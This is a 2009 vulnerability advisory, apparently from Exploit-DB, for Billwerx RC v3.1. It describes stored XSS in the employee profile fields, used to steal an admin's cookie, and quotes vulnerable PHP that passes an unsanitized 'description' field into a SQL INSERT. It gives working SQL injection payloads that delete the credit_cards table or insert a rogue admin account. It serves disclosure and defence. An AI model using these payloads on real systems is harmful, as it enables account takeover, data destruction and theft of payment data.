Billwerx RC v3.1 Multiple Vulnerabilities

vendor:

Billwerx RC

by:

mr_me

8.8

CVSS

HIGH

XSS and SQL Injection

CWE

Product Name: Billwerx RC

Affected Version From: v3.1

Affected Version To: v3.1

Patch Exists: YES

Related CWE: N/A

CPE: a:billwerx:billwerx_rc:3.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows Vista

Found in 2009

Billwerx RC v3.1 Multiple Vulnerabilities

A regular employee can embed javascript code that could be executed within the context of the admin's browser. If the user edits their own profile by going to 'http://[server]/billwerx_public_beta/employees/update_employee.php?employee_id=2' and places '<script>alert(document.cookie)</script>' into any of the following fields: 'firstname', 'billing address', 'billing city', 'billing province', 'billing postal', 'billing country' and then gives the following link to the admin: http://[server]/billwerx_public_beta/employees/update_employee.php?employee_id=2 The user could potentially log the admins cookie and reset their own session thus gaining administration access. For SQL Injection, the description post value is unsanitized and can be exploited using ','1'); DELETE FROM credit_cards;/* or ','1'); insert into employees (username, password, firstname, lastname, email, admin) values ('hacker','hacker','hacker','hacker','hacker@hacker.com','1');/*

Mitigation:

Input validation and sanitization should be done for all user inputs.

Source

Exploit-DB raw data:

#################################################################

#

# Billwerx RC v3.1 Multiple Vulnerabilities

# Found By: mr_me

# Download: http://www.billwerx.com/download.php

# Tested On: Windows Vista

# Note: For educational purposes only

#

#################################################################



XSS POC:



A regular employee can embed javascript code that could be executed within the context of the admin's browser.

If the user edits their own profile by going to "http://[server]/billwerx_public_beta/employees/update_employee.php?employee_id=2" 

and places "<script>alert(document.cookie)</script>" 

into any of the following fields: 'firstname', 'billing address', 'billing city', 'billing province', 'billing postal', 'billing country' and then gives the following link to the admin:



http://[server]/billwerx_public_beta/employees/update_employee.php?employee_id=2



The user could potentially log the admins cookie and reset their own session thus gaining administration access.



SQL Injection POC:



http://127.0.0.1/billwerx_public_beta/employees/company_files.php



You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1



Here you can see in the code snip that the description post value is unsanitized. 



8<-------------snip-------------8<



$description = strtolower($_POST['description']);



$employee_id = $_SESSION['employee_id'];



$readfile = fopen($temp_name, 'r');

$content = fread($readfile, filesize($temp_name));

$content = addslashes($content);

fclose($readfile);



# Assign values to a database table:

$doSQL = "INSERT INTO company_files (name, size, type, content, public, description, employee_id) VALUES ('$name', '$size', '$type', '$content', '$public', '$description', '$employee_id')";



8<-------------snip-------------8<



SQL Injection exploit:



','1'); DELETE FROM credit_cards;/*



or



','1'); insert into employees values (4, 'mr_me', 'hello', '', '', '', '', '', 'mr_me@hax0r.com', 'lol_mypassword', 0.00, 3, '', '', '', '', '', '2009-07-28 10:47:59');/*